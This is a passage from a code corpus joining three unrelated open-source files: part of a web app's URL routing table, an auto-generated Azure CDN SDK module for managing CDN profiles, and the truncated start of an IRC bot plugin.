Rule([
'/project/<pid>/private_link/edit/',
'/project/<pid>/node/<nid>/private_link/edit/',
], 'put', project_views.node.project_private_link_edit, json_renderer),
Rule([
'/project/<pid>/private_link/',
'/project/<pid>/node/<nid>/private_link/',
], 'delete', project_views.node.remove_private_link, json_renderer),
Rule([
'/project/<pid>/private_link/',
'/project/<pid>/node/<nid>/private_link/',
], 'get', project_views.node.private_link_table, json_renderer),
# Create, using existing project as a template
Rule([
'/project/new/<nid>/',
], 'post', project_views.node.project_new_from_template, json_renderer),
# Update
Rule(
[
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
],
'put',
project_views.node.update_node,
json_renderer,
),
# Remove
Rule(
[
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
],
'delete',
project_views.node.component_remove,
json_renderer,
),
# Reorder components
Rule('/project/<pid>/reorder_components/', 'post',
project_views.node.project_reorder_components, json_renderer),
# Edit node
Rule([
'/project/<pid>/edit/',
'/project/<pid>/node/<nid>/edit/',
], 'post', project_views.node.edit_node, json_renderer),
# Add / remove tags
Rule([
'/project/<pid>/tags/',
'/project/<pid>/node/<nid>/tags/',
'/project/<pid>/tags/<tag>/',
'/project/<pid>/node/<nid>/tags/<tag>/',
], 'post', project_views.tag.project_add_tag, json_renderer),
Rule([
'/project/<pid>/tags/',
'/project/<pid>/node/<nid>/tags/',
'/project/<pid>/tags/<tag>/',
'/project/<pid>/node/<nid>/tags/<tag>/',
], 'delete', project_views.tag.project_remove_tag, json_renderer),
# Add / remove contributors
Rule([
'/project/<pid>/contributors/',
'/project/<pid>/node/<nid>/contributors/',
], 'post', project_views.contributor.project_contributors_post, json_renderer),
# Forks
Rule(
[
'/project/<pid>/fork/before/',
'/project/<pid>/node/<nid>/fork/before/',
], 'get', project_views.node.project_before_fork, json_renderer,
),
Rule(
[
'/project/<pid>/pointer/fork/',
'/project/<pid>/node/<nid>/pointer/fork/',
], 'post', project_views.node.fork_pointer, json_renderer,
),
# Registrations
Rule([
'/project/<pid>/beforeregister/',
            '/project/<pid>/node/<nid>/beforeregister/',
], 'get', project_views.register.project_before_register, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/register/',
'/project/<pid>/node/<nid>/drafts/<draft_id>/register/',
], 'post', project_views.drafts.register_draft_registration, json_renderer),
Rule([
'/project/<pid>/withdraw/',
'/project/<pid>/node/<nid>/withdraw/'
], 'post', project_views.register.node_registration_retraction_post, json_renderer),
Rule(
[
'/project/<pid>/identifiers/',
'/project/<pid>/node/<nid>/identifiers/',
],
'post',
identifier_views.node_identifiers_post,
json_renderer,
),
# Endpoint to fetch Rubeus.JS/Hgrid-formatted data
Rule(
[
'/project/<pid>/files/grid/',
'/project/<pid>/node/<nid>/files/grid/'
],
'get',
project_views.file.grid_data,
json_renderer
),
# Settings
Rule(
'/files/auth/',
'get',
addon_views.get_auth,
json_renderer,
),
Rule(
[
'/project/<pid>/waterbutler/logs/',
'/project/<pid>/node/<nid>/waterbutler/logs/',
],
'put',
addon_views.create_waterbutler_log,
json_renderer,
),
Rule(
[
'/registration/<pid>/callbacks/',
],
'put',
project_views.register.registration_callbacks,
json_renderer,
),
Rule(
'/settings/addons/',
'post',
profile_views.user_choose_addons,
json_renderer,
),
Rule(
'/settings/notifications/',
'get',
profile_views.user_notifications,
json_renderer,
),
Rule(
'/settings/notifications/',
'post',
profile_views.user_choose_mailing_lists,
json_renderer,
),
Rule(
'/subscriptions/',
'get',
notification_views.get_subscriptions,
json_renderer,
),
Rule(
[
'/project/<pid>/subscriptions/',
'/project/<pid>/node/<nid>/subscriptions/'
],
'get',
notification_views.get_node_subscriptions,
json_renderer,
),
Rule(
[
'/project/<pid>/tree/',
'/project/<pid>/node/<nid>/tree/'
],
'get',
project_views.node.get_node_tree,
json_renderer,
),
Rule(
'/subscriptions/',
'post',
notification_views.configure_subscription,
json_renderer,
),
Rule(
[
'/project/<pid>/settings/addons/',
'/project/<pid>/node/<nid>/settings/addons/',
],
'post',
project_views.node.node_choose_addons,
json_renderer,
),
Rule(
[
'/project/<pid>/settings/comments/',
'/project/<pid>/node/<nid>/settings/comments/',
],
'post',
project_views.node.configure_comments,
json_renderer,
),
Rule(
[
'/project/<pid>/settings/requests/',
'/project/<pid>/node/<nid>/settings/requests/',
],
'post',
project_views.node.configure_requests,
json_renderer,
),
# Invite Users
Rule(
[
'/project/<pid>/invite_contributor/',
'/project/<pid>/node/<nid>/invite_contributor/'
],
'post',
project_views.contributor.invite_contributor_post,
json_renderer
)
], prefix='/api/v1')
# Set up static routing for addons and providers
# NOTE: We use nginx to serve static addon assets in production
addon_base_path = os.path.abspath('addons')
provider_static_path = os.path.abspath('assets')
if settings.DEV_MODE:
@app.route('/static/addons/<addon>/<path:filename>')
def addon_static(addon, filename):
addon_path = os.path.join(addon_base_path, addon, 'static')
return send_from_directory(addon_path, filename)
@app.route('/assets/<filename>')
def provider_static(filename):
return send_from_directory(provider_static_path, filename)
@app.route('/ember-cli-live-reload.js')
def ember_cli_live_reload():
req = requests.get('{}/ember-cli-live-reload.js'.format(settings.LIVE_RELOAD_DOMAIN), stream=True)
return Response(stream_with_context(req.iter_content()), content_type=req.headers['content-type'])
| apache-2.0 | -9,182,283,988,473,625,000 | 30.407534 | 182 | 0.509414 | false |
lmazuel/azure-sdk-for-python | azure-mgmt-cdn/azure/mgmt/cdn/operations/profiles_operations.py | 1 | 36221 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrest.exceptions import DeserializationError
from msrestazure.azure_operation import AzureOperationPoller
from .. import models
class ProfilesOperations(object):
"""ProfilesOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Version of the API to be used with the client request. Current version is 2017-04-02. Constant value: "2017-04-02".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-04-02"
self.config = config
def list(
self, custom_headers=None, raw=False, **operation_config):
"""Lists all of the CDN profiles within an Azure subscription.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of Profile
:rtype:
~azure.mgmt.cdn.models.ProfilePaged[~azure.mgmt.cdn.models.Profile]
:raises:
:class:`ErrorResponseException<azure.mgmt.cdn.models.ErrorResponseException>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.ProfilePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.ProfilePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Cdn/profiles'}
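    # A usage sketch for ``list``; ``credentials`` and ``subscription_id``
    # are placeholders supplied by the caller:
    #
    #     from azure.mgmt.cdn import CdnManagementClient
    #     client = CdnManagementClient(credentials, subscription_id)
    #     for profile in client.profiles.list():
    #         print(profile.name, profile.resource_state)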
def list_by_resource_group(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Lists all of the CDN profiles within a resource group.
:param resource_group_name: Name of the Resource group within the
Azure subscription.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of Profile
:rtype:
~azure.mgmt.cdn.models.ProfilePaged[~azure.mgmt.cdn.models.Profile]
:raises:
:class:`ErrorResponseException<azure.mgmt.cdn.models.ErrorResponseException>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.ProfilePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.ProfilePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cdn/profiles'}
def get(
self, resource_group_name, profile_name, custom_headers=None, raw=False, **operation_config):
"""Gets a CDN profile with the specified profile name under the specified
subscription and resource group.
:param resource_group_name: Name of the Resource group within the
Azure subscription.
:type resource_group_name: str
:param profile_name: Name of the CDN profile which is unique within
the resource group.
:type profile_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Profile or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cdn.models.Profile or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.cdn.models.ErrorResponseException>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'profileName': self._serialize.url("profile_name", profile_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Profile', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cdn/profiles/{profileName}'}
def _create_initial(
self, resource_group_name, profile_name, profile, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'profileName': self._serialize.url("profile_name", profile_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(profile, 'Profile')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200, 201, 202]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Profile', response)
if response.status_code == 201:
deserialized = self._deserialize('Profile', response)
if response.status_code == 202:
deserialized = self._deserialize('Profile', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create(
self, resource_group_name, profile_name, profile, custom_headers=None, raw=False, **operation_config):
"""Creates a new CDN profile with a profile name under the specified
subscription and resource group.
:param resource_group_name: Name of the Resource group within the
Azure subscription.
:type resource_group_name: str
:param profile_name: Name of the CDN profile which is unique within
the resource group.
:type profile_name: str
:param profile: Profile properties needed to create a new profile.
:type profile: ~azure.mgmt.cdn.models.Profile
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:return: An instance of AzureOperationPoller that returns Profile or
ClientRawResponse if raw=true
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cdn.models.Profile]
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.cdn.models.ErrorResponseException>`
"""
raw_result = self._create_initial(
resource_group_name=resource_group_name,
profile_name=profile_name,
profile=profile,
custom_headers=custom_headers,
raw=True,
**operation_config
)
if raw:
return raw_result
# Construct and send request
def long_running_send():
return raw_result.response
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
header_parameters = {}
header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
return self._client.send(
request, header_parameters, stream=False, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 201, 202]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = self._deserialize('Profile', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
create.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cdn/profiles/{profileName}'}
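    # A usage sketch for the long-running ``create``; resource names and the
    # SKU value are illustrative:
    #
    #     from azure.mgmt.cdn.models import Profile, Sku
    #     poller = client.profiles.create(
    #         'myResourceGroup', 'myProfile',
    #         Profile(location='WestUs', sku=Sku(name='Standard_Verizon')))
    #     profile = poller.result()  # blocks until provisioning completes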
def _update_initial(
self, resource_group_name, profile_name, tags=None, custom_headers=None, raw=False, **operation_config):
profile_update_parameters = models.ProfileUpdateParameters(tags=tags)
# Construct URL
url = self.update.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'profileName': self._serialize.url("profile_name", profile_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(profile_update_parameters, 'ProfileUpdateParameters')
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200, 202]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Profile', response)
if response.status_code == 202:
deserialized = self._deserialize('Profile', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update(
self, resource_group_name, profile_name, tags=None, custom_headers=None, raw=False, **operation_config):
"""Updates an existing CDN profile with the specified profile name under
the specified subscription and resource group.
:param resource_group_name: Name of the Resource group within the
Azure subscription.
:type resource_group_name: str
:param profile_name: Name of the CDN profile which is unique within
the resource group.
:type profile_name: str
:param tags: Profile tags
:type tags: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:return: An instance of AzureOperationPoller that returns Profile or
ClientRawResponse if raw=true
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cdn.models.Profile]
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.cdn.models.ErrorResponseException>`
"""
raw_result = self._update_initial(
resource_group_name=resource_group_name,
profile_name=profile_name,
tags=tags,
custom_headers=custom_headers,
raw=True,
**operation_config
)
if raw:
return raw_result
# Construct and send request
def long_running_send():
return raw_result.response
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
header_parameters = {}
header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
return self._client.send(
request, header_parameters, stream=False, **operation_config)
def get_long_running_output(response):
if response.status_code not in [200, 202]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = self._deserialize('Profile', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cdn/profiles/{profileName}'}
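    # A usage sketch for ``update``; only tags can be patched through this
    # operation (names are illustrative):
    #
    #     poller = client.profiles.update('myResourceGroup', 'myProfile',
    #                                     tags={'env': 'production'})
    #     profile = poller.result()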
def _delete_initial(
self, resource_group_name, profile_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'profileName': self._serialize.url("profile_name", profile_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [202, 204]:
raise models.ErrorResponseException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, resource_group_name, profile_name, custom_headers=None, raw=False, **operation_config):
"""Deletes an existing CDN profile with the specified parameters. Deleting
a profile will result in the deletion of all of the sub-resources
including endpoints, origins and custom domains.
:param resource_group_name: Name of the Resource group within the
Azure subscription.
:type resource_group_name: str
:param profile_name: Name of the CDN profile which is unique within
the resource group.
:type profile_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:return: An instance of AzureOperationPoller that returns None or
ClientRawResponse if raw=true
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.cdn.models.ErrorResponseException>`
"""
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
profile_name=profile_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
if raw:
return raw_result
# Construct and send request
def long_running_send():
return raw_result.response
def get_long_running_status(status_link, headers=None):
request = self._client.get(status_link)
if headers:
request.headers.update(headers)
header_parameters = {}
header_parameters['x-ms-client-request-id'] = raw_result.response.request.headers['x-ms-client-request-id']
return self._client.send(
request, header_parameters, stream=False, **operation_config)
def get_long_running_output(response):
if response.status_code not in [202, 204]:
raise models.ErrorResponseException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cdn/profiles/{profileName}'}
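    # Usage sketch (illustrative, not part of the generated client): the poller
    # returned by delete() can be waited on synchronously, e.g.
    #   poller = client.profiles.delete(resource_group_name, profile_name)
    #   poller.wait()  # blocks until the profile and its sub-resources are gone
    # where `client` is assumed to be a CdnManagementClient instance.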
def generate_sso_uri(
self, resource_group_name, profile_name, custom_headers=None, raw=False, **operation_config):
"""Generates a dynamic SSO URI used to sign in to the CDN supplemental
        portal. Supplemental portal is used to configure advanced feature
capabilities that are not yet available in the Azure portal, such as
core reports in a standard profile; rules engine, advanced HTTP
reports, and real-time stats and alerts in a premium profile. The SSO
URI changes approximately every 10 minutes.
:param resource_group_name: Name of the Resource group within the
Azure subscription.
:type resource_group_name: str
:param profile_name: Name of the CDN profile which is unique within
the resource group.
:type profile_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: SsoUri or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cdn.models.SsoUri or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.cdn.models.ErrorResponseException>`
"""
# Construct URL
url = self.generate_sso_uri.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'profileName': self._serialize.url("profile_name", profile_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SsoUri', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
generate_sso_uri.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cdn/profiles/{profileName}/generateSsoUri'}
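    # Usage sketch (illustrative): generate_sso_uri() is a plain synchronous call, e.g.
    #   sso = client.profiles.generate_sso_uri(resource_group_name, profile_name)
    #   print(sso.sso_uri_value)  # attribute name assumed from the SsoUri model
    # where `client` is assumed to be a CdnManagementClient instance.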
def list_supported_optimization_types(
self, resource_group_name, profile_name, custom_headers=None, raw=False, **operation_config):
"""Gets the supported optimization types for the current profile. A user
can create an endpoint with an optimization type from the listed
values.
:param resource_group_name: Name of the Resource group within the
Azure subscription.
:type resource_group_name: str
:param profile_name: Name of the CDN profile which is unique within
the resource group.
:type profile_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: SupportedOptimizationTypesListResult or ClientRawResponse if
raw=true
:rtype: ~azure.mgmt.cdn.models.SupportedOptimizationTypesListResult or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.cdn.models.ErrorResponseException>`
"""
# Construct URL
url = self.list_supported_optimization_types.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'profileName': self._serialize.url("profile_name", profile_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SupportedOptimizationTypesListResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
list_supported_optimization_types.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cdn/profiles/{profileName}/getSupportedOptimizationTypes'}
def list_resource_usage(
self, resource_group_name, profile_name, custom_headers=None, raw=False, **operation_config):
"""Checks the quota and actual usage of endpoints under the given CDN
profile.
:param resource_group_name: Name of the Resource group within the
Azure subscription.
:type resource_group_name: str
:param profile_name: Name of the CDN profile which is unique within
the resource group.
:type profile_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of ResourceUsage
:rtype:
~azure.mgmt.cdn.models.ResourceUsagePaged[~azure.mgmt.cdn.models.ResourceUsage]
:raises:
:class:`ErrorResponseException<azure.mgmt.cdn.models.ErrorResponseException>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list_resource_usage.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'profileName': self._serialize.url("profile_name", profile_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.ResourceUsagePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.ResourceUsagePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list_resource_usage.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Cdn/profiles/{profileName}/checkResourceUsage'}
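    # Usage sketch (illustrative): the returned pager fetches further pages lazily
    # while being iterated, e.g.
    #   for usage in client.profiles.list_resource_usage(resource_group_name, profile_name):
    #       print(usage.resource_type, usage.current_value, usage.limit)
    # (field names assumed from the ResourceUsage model).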
| mit | 488,939,134,406,142,200 | 45.082697 | 203 | 0.640844 | false |
pixeltasim/IRCBot-Pixeltasim | plugins/scp.py | 1 | 1594 | from whiffle import wikidotapi
from util import hook
import re
import time,threading
@hook.command
def scp(inp): #this is for WL use, easily adaptable to SCP
